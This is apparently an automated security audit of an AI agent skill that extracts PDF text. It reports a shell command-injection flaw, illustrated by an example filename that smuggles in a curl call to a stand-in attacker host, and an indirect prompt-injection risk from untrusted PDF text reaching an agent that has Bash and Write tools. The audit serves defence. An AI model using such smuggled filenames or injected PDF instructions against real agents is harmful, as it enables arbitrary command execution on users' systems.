Skills
skills/wordflowlab/agentsdk/pdfmd/Gen Agent Trust Hub

pdfmd

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • COMMAND_EXECUTION (HIGH): The skill's instructions in SKILL.md direct the agent to construct a shell command by interpolating a user-controlled file path: python skills/pdfmd/pdf_extract.py --input "<PDF 文件路径>". An attacker providing a crafted filename (e.g., "; curl attacker.com/ls #.pdf) could achieve arbitrary command execution on the host system.
  • PROMPT_INJECTION (LOW): The skill is susceptible to Indirect Prompt Injection (Category 8) because it extracts text from untrusted PDF files and feeds it directly into the LLM for translation and formatting.
  • Ingestion points: The pdf_extract.py script reads external, potentially attacker-controlled PDF files via the pypdf library.
  • Boundary markers: The script uses weak, predictable markers like ===== 第 {i} 页 ===== which are easily bypassed by embedded instructions.
  • Capability inventory: The agent has access to Bash and Write tools, providing a significant impact if an injection succeeds.
  • Sanitization: No sanitization or filtering of the extracted text is performed before it is presented to the LLM for processing.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 17, 2026, 06:31 PM